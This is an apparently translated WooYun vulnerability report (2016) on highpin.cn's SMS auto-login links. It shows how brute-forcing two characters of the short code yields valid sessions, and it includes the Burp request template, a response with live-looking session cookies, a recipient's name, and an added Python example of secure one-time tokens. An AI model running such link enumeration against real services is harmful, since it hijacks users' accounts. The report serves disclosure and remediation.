WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online ------------------------ http://drop.zone.ci/
2016-05-16: Details reported to the vendor, awaiting vendor handling
2016-05-16: Vendor confirmed; details disclosed to the vendor only
2016-05-26: Details disclosed to core white hats and domain experts
2016-06-05: Details disclosed to regular white hats
2016-06-15: Details disclosed to intern white hats
2016-06-30: Details disclosed to the public
Design flaw in 智联卓聘 (highpin.cn): a single link logs into your account and allows arbitrary actions
The story starts with a text message.
[智联卓聘] Hello 蔡广娜, I am a Zhuopin headhunting consultant and have an art position opportunity for you. Tap t.highpin.cn/m/c3Wec. Reply T to unsubscribe.
Opening t.highpin.cn/m/c3Wec directly logs you into that account automatically.
Using Burp Suite to brute-force the last two characters: 3844 requests, 101 valid hits (every response with a length greater than 1000 carries the session in the response).
GET /m/c3W§e1§ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: t.highpin.cn

HTTP/1.1 302 Found
Server: Tengine
Date: Mon, 16 May 2016 06:34:09 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 306
Connection: close
Cache-Control: private
Location: http://m.highpin.cn/Job/SearchList?KeyScope=1&Key=&JobLocation=&Industry=&JobType=&fromtype=767&type=1&l=t&code=5C2C4C755A694C79056D1479446C5C7549345D2C4B758
Set-Cookie: SeekerInfo=UserName=566D02360367543707355F6D063600675D370635556D7&UserID=5E6D0F3603675F370235516D7&CID=C0E4F42495631542778490438&NameCN=%e5%bc%a0%e8%b6%85; domain=highpin.cn; path=/
Set-Cookie: UserStatus=UserStatus=556D073604675B371B35576D023618675C370035476D0636016757370535536D0D36056754377; domain=highpin.cn; path=/
Set-Cookie: SeekerChatAuth=token=0E4F42495631542778490438295F66637D377228014F4A49553157277A49; domain=highpin.cn; path=/
Set-Cookie: SeekerMSiteChatAuth=token=0E4F42495631542778490438295F66637D377228014F4A49553157277A49; domain=highpin.cn; path=/
Set-Cookie: route=72c625c1ad8094466eb6767d84faf89f;Path=/
Set-Cookie: NSC_ijhiqjo-172.19.0.190=ffffffffaf1b1cd845525d5f4f58455e445a4a423660;expires=Mon, 16-May-2016 06:40:15 GMT;path=/;httponly

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://m.highpin.cn/Job/SearchList?KeyScope=1&Key=&JobLocation=&Industry=&JobType=&fromtype=767&type=1&l=t&code=5C2C4C755A694C79056D1479446C5C7549345D2C4B758">here</a>.</h2></body></html>
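The root cause above is that the auto-login link carries a five-character code that is small enough to enumerate, and the 302 hands out a full session to whoever presents it. As an added example (not code from the report or from highpin.cn), the following hypothetical Python shows how such a login-link token should be issued and redeemed: 128 bits of randomness, stored only as a hash, time-limited and single-use. keyspace() also gives the 3844-candidate space the report enumerated for the last two characters.

```python
import hashlib
import secrets
import time

# Assumption: the short code uses a 62-character alphanumeric alphabet, so the
# two brute-forced positions give 62**2 == 3844 candidates, as in the report.
ALPHABET_SIZE = 62


def keyspace(positions: int) -> int:
    """Number of candidate codes for `positions` alphanumeric characters."""
    return ALPHABET_SIZE ** positions


class MagicLinkStore:
    """Hypothetical issuance and redemption of one-time login-link tokens.

    The raw token is only ever sent to the user; the server keeps a SHA-256
    digest, so a database leak does not expose usable links.
    """

    def __init__(self, ttl_seconds: int = 900, now=time.time):
        self._ttl = ttl_seconds
        self._now = now  # injectable clock, for testing expiry
        self._pending = {}  # sha256(token) -> (user_id, expires_at)

    @staticmethod
    def _digest(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user_id: str) -> str:
        # 16 random bytes = 128 bits of entropy, versus ~30 bits for 5 alphanumerics.
        token = secrets.token_urlsafe(16)
        self._pending[self._digest(token)] = (user_id, self._now() + self._ttl)
        return token

    def redeem(self, token: str):
        """Return the user_id exactly once for a valid, unexpired token; else None."""
        # pop() makes the token single-use even when the expiry check below fails.
        entry = self._pending.pop(self._digest(token), None)
        if entry is None:
            return None
        user_id, expires_at = entry
        if self._now() > expires_at:
            return None
        return user_id
```

Redemption should additionally be rate-limited per client, since a burst of misses against the link endpoint is exactly the signature of the enumeration shown in the request above.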
As stated in the title.
Severity: High
Vulnerability Rank: 10
Confirmed: 2016-05-16 19:26
Thank you for your attention to Zhaopin security; the issue has been forwarded to the responsible team.
None yet